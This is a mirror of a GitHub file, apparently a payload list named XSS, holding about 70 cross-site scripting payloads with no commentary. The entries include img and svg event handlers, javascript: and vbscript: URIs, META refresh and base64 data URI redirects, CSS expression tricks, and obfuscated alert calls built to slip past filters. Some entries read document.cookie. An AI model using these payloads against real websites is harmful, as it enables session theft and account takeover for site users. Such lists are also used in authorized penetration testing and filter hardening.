mirror of
https://github.com/ShadowByte1/XSS.git
synced 2024-12-18 18:36:11 +00:00
70 lines
3.5 KiB
Plaintext
70 lines
3.5 KiB
Plaintext
|
<img src=x onerror="javascript:alert('XSS')">
|
|||
|
<IMG SRC=javascript:alert('XSS')>
|
|||
|
<IMG SRC=javascript:alert('XSS')>
|
|||
|
<IMG SRC="jav ascript:alert('XSS');">
|
|||
|
<IMG SRC="jav	ascript:alert('XSS');">
|
|||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|||
|
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
|
|||
|
<IMG SRC="  javascript:alert('XSS');">
|
|||
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|||
|
<<SCRIPT>alert("XSS");//\<</SCRIPT>
|
|||
|
<IMG SRC="`<javascript:alert>`('XSS')"
|
|||
|
\";alert('XSS');//
|
|||
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
|||
|
Set.constructor`alert\x28document.domain\x29
|
|||
|
exp/*<A STYLE='no\xss:noxss("*//*");
|
|||
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|||
|
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|||
|
<STYLE type="text/css">BODY{background:url("<javascript:alert>('XSS')")}</STYLE>
|
|||
|
¼script¾alert(¢XSS¢)¼/script¾
|
|||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|||
|
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|||
|
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|||
|
<HTML><BODY>
|
|||
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
|||
|
<?import namespace="t" implementation="#default#time2">
|
|||
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
|
|||
|
</BODY></HTML>
|
|||
|
|
|||
|
|
|||
|
<? echo('<SCR)';
|
|||
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
|||
|
|
|||
|
<script> ... setTimeout(\\"writetitle()\\",$\_GET\[xss\]) ... </script>
|
|||
|
|
|||
|
/?xss=500); alert(document.cookie);//
|
|||
|
|
|||
|
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
|
|||
|
<Video> <source onerror = "javascript: alert (XSS)">
|
|||
|
<Input value = "XSS" type = text>
|
|||
|
<applet code="javascript:confirm(document.cookie);">
|
|||
|
<isindex x="javascript:" onmouseover="alert(XSS)">
|
|||
|
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|||
|
"><img src="x:x" onerror="alert(XSS)">
|
|||
|
"><iframe src="javascript:alert(XSS)">
|
|||
|
<object data="javascript:alert(XSS)">
|
|||
|
<isindex type=image src=1 onerror=alert(XSS)>
|
|||
|
<img src=x:alert(alt) onerror=eval(src) alt=0>
|
|||
|
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
|
|||
|
<iframe/src="data:text/html,<svg onload=alert(1)>">
|
|||
|
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
|
|||
|
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
|
|||
|
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
|
|||
|
<iframe src=javascript:alert(document.location)>
|
|||
|
<form><a href="javascript:\u0061lert(1)">X
|
|||
|
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
|
|||
|
<style>//*{x:expression(alert(/xss/))}//<style></style>
|
|||
|
(alert)(1)
|
|||
|
a=alert,a(1)
|
|||
|
[1].find(alert)
|
|||
|
top[“al”+”ert”](1)
|
|||
|
top[/al/.source+/ert/.source](1)
|
|||
|
al\u0065rt(1)
|
|||
|
top[‘al\145rt’](1)
|
|||
|
top[‘al\x65rt’](1)
|
|||
|
top[8680439..toString(30)](1)
|
|||
|
alert?.()
|
|||
|
(alert())
|
|||
|
``${alert``}``
|